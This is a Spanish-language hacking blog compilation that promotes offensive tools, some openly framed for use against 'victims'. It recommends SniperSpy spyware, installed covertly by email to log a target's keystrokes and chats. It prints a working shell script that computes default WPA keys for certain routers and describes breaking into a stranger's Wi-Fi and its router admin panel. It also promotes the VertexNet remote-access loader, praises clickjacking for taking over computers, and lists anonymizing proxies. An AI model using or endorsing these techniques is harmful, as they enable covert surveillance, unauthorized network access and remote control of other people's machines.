hackeando Facebook, Gmail, Yahoo, Msn, etc

Saludos Mundo Libre.

Hackeando Redes Sociales con SniperSpy.

No hay acceso físico a su PC a distancia que se necesita parainstalar el software de monitoreo. Una vez instalado, puede ver la pantalla de Live y navegar por el sistema de archivos desde cualquier lugar en cualquier momento. También puede ver loschats, sitios web, las pulsaciones de teclado en cualquier idioma y más, con capturas de pantalla.


Este software se instala de forma remota al ordenador a travésde correo electrónico. A diferencia de los títulos de monitoreo a distancia otros en el mercado, SniperSpy es total y completamente compatible con cualquier servidor de seguridad, como Windows XP, Windows Vista y complemento en los firewalls.


Entonces, el programa registra las actividades del usuario y envía los datos a su cuenta en línea. Que ingrese a su cuenta de forma segura a ver los registros de utilización de su propiacontraseña en Acceso. Puede acceder al panel de control devivir dentro de su cuenta en línea segura.


No hay que esplicar como funciona este software tan simple como introducir el motor en la victima y a disfrutar.


Lo podras descargar desde : http://www.sniperspy.com/

Una Exelente Aplicacion que ami me funciona.

Traduccion: Dellcom1@

Saludos Mundo Libre.

redes Wifi con Android

Saludos Mundo libre.

Un Exelente Articulo para hacking de redes con Android.

De redes inalámbricas y redes wifi se ha hablado mucho y se hablará, y más teniendo en cuenta cómo los diferentes proveedores de Internet se empeñan, constantemente, en dejar a la seguridad en un segundo plano. A pesar de que ya se utilizan mecanismos de cifrado más fuertes que el desfasado WEP, léase WPA, aún se recurre a claves preconfiguradas en los routers inalámbricos que son fácilmente predecibles y que permiten comprometer la red wifi sin demasiado esfuerzo, y todo eso sin que el usuario final sea muchas veces consciente.

Con la popularidad que han ido adquirido los diferentes terminales móviles, smartphones, ipads y demás, cada vez es más sencillo detectar redes inalámbricas e intentar evadir sus mecanismos de seguridad ya que, además, en el caso de los dispositivos con Android, cada vez existen más aplicaciones que poder utilizar.

Android es un Sistema Operativo basado en Linux para dispositivos móviles, tales como teléfonos inteligentes o tablets propiedad de Google desde el año 2005 que está muy extendido. Al estar basado en Linux y por la gran expansión que ha tenido, es fácil encontrar todo tipo de programas para el análisis y seguridad de las redes inalámbricas, analizadores de puertos, clientes SSH, etc.

Caminando por alguna de las calles de cualquier ciudad, es cuestión de minutos romper una clave WPA que, tradicionalmente, hubiera costado mucho más tiempo usando ataques por diccionario e, incluso, fuerza bruta. Desde noviembre de 2010, se conoce el patrón utilizado por diferentes compañías para establecer las claves WPA preconfiguradas en redes del tipo WLAN_XXXX y JAZZTEL_XXXX.

Actualmente, ya existen varias herramientas para descubrir las claves WPA/WEB de una red inalámbrica. Una de esas herramientas esWPA Magickey (http://wpamagickey.com) que, con sólo conocer el nombre de la red wifi (ESSID) y la dirección MAC del router proporciona la clave WPA.

El script que propició WPA Magickey es:

echo CalcWLAN by a.s.r

if [ $# -ne 2 ]
then
echo "Usage: $0 "
echo
echo "Example: $0 WLAN_C58D 64:68:0C:C5:C5:90"
exit 1
fi

HEAD=$(echo -n "$1" | tr 'a-z' 'A-Z' | cut -d_ -f2)
BSSID=$(echo -n "$2" | tr 'a-z' 'A-Z' | tr -d :)
BSSIDP=$(echo -n "$BSSID" | cut -c-8)
KEY=$(echo -n bcgbghgg$BSSIDP$HEAD$BSSID | md5sum | cut -c-20)

echo "La clave es $KEY"

WPA Magickey (gracias a a.s.r y a seguridadwireless) dispone de una versión especial para dispositivos móviles Android mucho más elaborada ya que es capaz no sólo de proporcionar la clave WPA por defecto, sino que incluye un scanner de redes que avisa si detecta algún objetivo potencial cercano. Existen dos versiones, una gratuita (http://www.androidzoom.com/android_applications/tools/wpamagickey-wpa-keygen-free_upbc.html) y con publicidad que únicamente accede a redes con routers marca Comtrend y otra de pago (http://www.androidzoom.com/android_applications/tools/wpamagickey-wpa-keygen-audit_uouf.html) en la que se incluyen el resto de routers Zyxel y un diccionario de claves WPA para redes que hayan modificado el nombre (ESSID) por defecto. Además, en la versión de pago, se guarda un historial de aquellas redes que hayan sido analizadas.

Otra de las aplicaciones gratuitas para el Sistema Operativo Android es WPA Tester de Carlo Marinangeli que se puede descargar desde la siguiente dirección: http://www.androidzoom.com/android_applications/communication/wpa-tester_lsre.html

WPA Tester soporta los siguientes ESSIDs:

Alice
Fastweb
Vodafone
Bbox-
BigPond
Discus-
Discus--
Dlink-
DMAX
Eircom
Huawei
JAZZTEL_
INFINITUM
InfostradaWiFi
O2Wireless
Ono
Otenet
Orange-
Privat
SKY
SpeedTouch
TECOM
Thomson
Verizon
WiFi
WLAN_
WLAN
YaCom

Además de facilitar la clave WPA, también incluye un escáner de redes Wifi que muestra todas aquellas redes inalámbricas que estén dentro del alcance, tal y como se puede observar en la siguiente captura de pantalla:

Fig 1. Escaneo de las redes wifi que están al alcance del móvil
Se escoge una red de forma aleatoria para comprobar el funcionamiento de la herramienta:
Fig 2. Red wifi escogida para comprobar el funcionamiento de la herramienta

… y se procede a establecer la conexión.
Fig 3. Conexión establecida con la red escogida desde el smartphone

El proceso es muy sencillo pero ahora que ya se dispone de acceso a la red inalámbrica, es posible también acceder a la administración del router ya que es factible comprobar que si no se ha modificado el nombre de la red (ESSID) ni la clave WPA preconfigurada, las credenciales de acceso al router tampoco. Para ello existe otra aplicación denominada Router Password también disponible a través del Android Market:

https://market.android.com/details?id=net.davidgouveia.routerpasswords

Router Password recopila en una base de datos las claves y métodos de acceso a los routers más populares y comunes existentes en el mercado.

Otra herramienta muy útil es Overlook Fing (http://es.appbrain.com/app/overlook-fing/com.overlook.android.fing) que permite escanear y descubrir servicios en una red, escanear puertos, revisar qué servicios están activos como, por ejemplo, HTTP, SMB, etc.

Fig 4. Capturas de pantalla del funcionamiento de la herramienta Overlook Fing

Otras aplicaciones interesantes son Network Info II, Net Status, Net Swiss o Wifi Analyzer que ayudan a analizar la seguridad de cualquier red inalámbrica desde un dispositivo móvil con Android.

Seguil leyendo:

http://www.hacktimes.com/Analizando_redes_Wifi_con_Android/

Author:

http://www.hacktimes.com/Analizando_redes_Wifi_con_Android/

Saludos Mundo Libre

VertexNet loader

Saludos Mundo libre.

VertexNet loader es una aplicacion de administracion remota de pc compatible con cualquier navegador.

 Este software te permite controlar a distancia todo tipo de máquinas que utilizan un panel web (con PHP), entonces no es necesario que PortForward y es más anónimo.


Este proyecto está codificada por el mismo autor de darkcomet-RAT y es totalmente gratuita (como siempre).


El módulo de control se ha codificado en C + + para que elmódulo más estable, rápido y más pequeño posible.

Codificado en C + +: Este software se codifica utilizando en C + + con Visual Studio 2008 entonces el trozo es muy pequeño,reactivos, estables y no necesitan ninguna dependencia.

No es necesario redirigir puertos: Debido a que este software a través del puerto 80 ya presentadas por host, no es necesarioque transmita los puertos en el router.

De trabajo en todas las ventanas: Vertex puede funcionar en cualquier sistema de Microsoft, incluso en Mac OSX y Linux si se utiliza un emulador de Windows básico.
Multithread technologie: Cuando haces una acción que no es necesario esperar hasta que se termine, todas las tareas se procederá al mismo tiempo.

VirtualBox aprobados: Vertex puede trabajar en máquinas virtuales, tales como (VMWare, VirtualBox, Sandboxies etc.), Entonces usted puede probar sin infectar sus propios sistemas.

Uso de PHP eficiente: El panel está codificado en PHP,entonces es muy fácil de instalar y hacer que funcione, también el panel es muy ligero con CSS / HTML / JS para el diseño.

El uso de MySQL: MySQL utilizando el panel de consultasynthax porque es uno de los langage SQL más común, establey muy rápido.

Explorador de la Cruz: El trabajo del panel en cualquier tipo denavegador como (Chrome, Opera, Firefox, Safari, Internet Explorer ...), de lo contrario se recomanded para no usar Internet Explorer si se desea sacar provecho de los últimos efectosCSS3.
Una exelente aplicacion.

La podemos descargar desde su web:
http://vertexnet-loader.com/index.php?page=download
Fuente:
http://vertexnet-loader.com/index.php?page=download
Traduccion: Dellcom1@
Saludos Mundo Libre.

Clickjacking

Saludos Mundo Libre.

Esta es una exelente tecnica para obtener acceso a lo que tu quieras esta tecnica es Clickjacking que es tratar que el usuario de Click en un anuncio, comentario, etc para redireccionarlo y tomar el mando del ordenador a tu antojo .


El clickjacking, o un ataque clickjack, es una vulnerabilidad utilizada por un atacante para obtener clics de un usuario infectado. El atacante puede obligar al usuario a hacer todo tipo de cosas a partir de ajustar la configuración de la computadora del usuario sin saberlo, a enviar al usuario a sitios Web que pueden tener código malicioso. Además, aprovechando AdobeFlash o JavaScript, un atacante podría incluso colocar un botóndebajo o encima de un botón legítimo, lo que hace difícil para los usuarios de detectar.

Asi que aprogramar para crear un clickjack es algo parecido al fishing pero cada uno tiene sus tecnica asi que a crear.


Estoy creando uno luego que lo termine expongo el codigo


Saludos Mundo Libre.

web hacking mantra

Saludos Mundo Libre.

Que es Mantra ! Mantra es un sueño hecho realidad. Es una colección de herramientas de código libre y abierto integrado en un navegador web, que puede ser práctico para los estudiantes,pruebas de penetración, los desarrolladores de aplicaciones web, profesionales de la seguridad, etc Es portátil, listo paracorrer, compacto y sigue el verdadero espíritu de software libre y de código abierto. Mantra es un marco de seguridad que puede ser muy útil en el desempeño de las cinco fases de ataques que incluyen el reconocimiento, exploración y enumeración, el acceso, la escalada de privilegios, el mantenimiento del acceso,y que cubre las pistas. Aparte de que también contiene un conjunto de herramientas dirigidas a los desarrolladores web ydepuradores de código que hace que sea útil tanto para la seguridad ofensiva y defensiva tareas relacionadas con la seguridad.

Mantra es lite, flexible, portátil y fácil de usar con una interfazgráfica de usuario agradable. Se puede llevar en tarjetas de memoria, unidades flash, CD / DVDs, etc se puede ejecutar de forma nativa en Linux, Windows y Mac. También puede ser instalado en su sistema en cuestión de minutos. Mantra es absolutamente gratuita y no requiere tiempo para que usted pueda crear.

Fuente : http://www.getmantra.com/index.html

Traduccion: Dellcom1@

Comentarios: Exelente aplicacion para auditorias web 100% recomendable.

Saludos Mundo Libre.

Anonymous Proxy List Verifier

Saludos Mundo Libre.

Verificador de Anonymous Proxy List es la herramienta perfecta para ser anónimo en Internet. Es un programa todo-en-uno quele ofrece todas las características estándar, además de muchos más que no encontrará en otros programas. Cosas como la posibilidad de descargar y extraer los poderes de dirección, foros, archivos, el portapapeles y luego de verificar y comprobarque para HTTP, HTTPS y SOCKS v4 / 5 la capacidad que tieneun programa único, que pocos se atreven a competir. Usted puede de manera rápida y fácil de comprobar el nivel deanonimato de los proxies HTTP, que permite encontrar tipos muy específicos de los representantes. Usted puede incluso programar el software para realizar tareas de forma automáticapor lo que no tiene que levantar un dedo para su uso. Y quedefinitivamente no es todo!

Hay más tantas características, por ejemplo, se puede ver cada país proxys y cuál es el nombre de host correspondiente. Usted puede cargar un máximo de miles y miles de proxies y revisarlos usando cientos de conexiones simultáneas para la velocidad más alta. # 1 Anonymous Proxy List Verifer puede realizar las tareas más sencillas hasta las más avanzadas, para satisfacersu necesidad específica. Este es un programa tanto para losamateaur y el usuario del equipo profesional. Compruébelo usted mismo, es libre de intentarlo!

Si ati te gusta estar en constante anonimato pues es cuestion de que lo pruebes y nos das tu opinion ya que tambien es de paga asi que hay te lo dejo.

Fuente & Seguir Leyendo

http://pcwin.com/Internet/_1_Anonymous_Proxy_List_Verifier/screen.htm

Traduccion: Dellcom1@

Saludos Mundo libre.

Proxy List

Saludos Mundo Libre.

Proxy list.


1 61.51.17.28 8080 transparent China Hoy
2 165.228.131.12 80 transparent Australia Hoy
3 220.181.39.121 80 transparent China Hoy
4 219.83.82.66 8080 transparent Indonesia Hoy
5 202.56.232.95 80 anonymous India Hoy
6 211.209.177.99 8080 high anonymity South Korea Hoy
7 91.121.3.37 8080 transparent France Hoy
8 125.243.233.71 8080 transparent South Korea Hoy
9 222.89.65.154 8080 transparent China Hoy
10 165.228.132.11 80 transparent Australia Hoy
11 211.231.187.4 80 anonymous South Korea Hoy
12 211.144.106.133 8000 anonymous China Hoy
13 199.203.55.3 3128 transparent Israel Hoy
14 165.228.132.10 3128 transparent Australia Hoy
15 61.135.204.121 80 transparent China Hoy
16 203.113.130.49 80 high anonymity Vietnam Hoy
17 202.168.228.238 8080 transparent Banglades Hoy
18 165.228.129.10 3128 transparent Australia Hoy
19 200.26.114.131 3128 transparent Argentina Hoy
20 80.69.65.97 3128 transparent Netherlands Hoy
21 89.34.9.50 6588 high anonymity Romania Hoy
22 148.223.112.194 3128 high anonymity Mexico Hoy
23 58.71.26.2 8080 transparent Philippines Hoy
24 201.28.123.98 3128 transparent Brazil Hoy
25 203.113.130.59 80 high anonymity Vietnam Hoy
26 81.200.15.156 3128 high anonymity Russian Federation Hoy
27 69.88.144.161 80 transparent United States Hoy
28 61.233.18.116 3128 high anonymity China Hoy
29 203.101.126.221 3128 transparent India Hoy
30 203.200.187.170 8080 transparent India Hoy
31 210.212.95.103 8080 transparent India Hoy
32 218.28.86.97 3128 transparent China Hoy
33 210.212.248.99 3128 transparent India Hoy
34 66.98.238.8 3128 transparent United States Hoy
35 209.88.89.183 3128 transparent Zimbabwe Hoy
36 201.21.80.182 3128 transparent Brazil Hoy
37 200.96.11.3 80 transparent Brazil Hoy
38 80.191.216.50 3128 transparent Iran Hoy
39 193.194.94.4 80 anonymous Algeria Hoy
40 64.34.113.50 80 transparent Canada Hoy
41 220.225.146.132 8080 transparent India Hoy
42 165.228.128.10 3128 transparent Australia Hoy
43 87.197.51.90 3128 transparent Slovak Republic Hoy
44 61.166.68.74 80 high anonymity China Hoy
45 61.47.19.215 8080 transparent Thailand Hoy
46 200.181.55.100 8080 transparent Brazil Hoy
47 64.34.113.100 80 transparent United States Hoy
48 202.175.58.10 80 transparent Macau Hoy
49 203.69.72.198 80 high anonymity Taiwan Hoy
50 220.8.16.187 8080 high anonymity Japan Hoy

Fuente:

http://www.proxys.com.ar/

 

Saludos Mundo Libre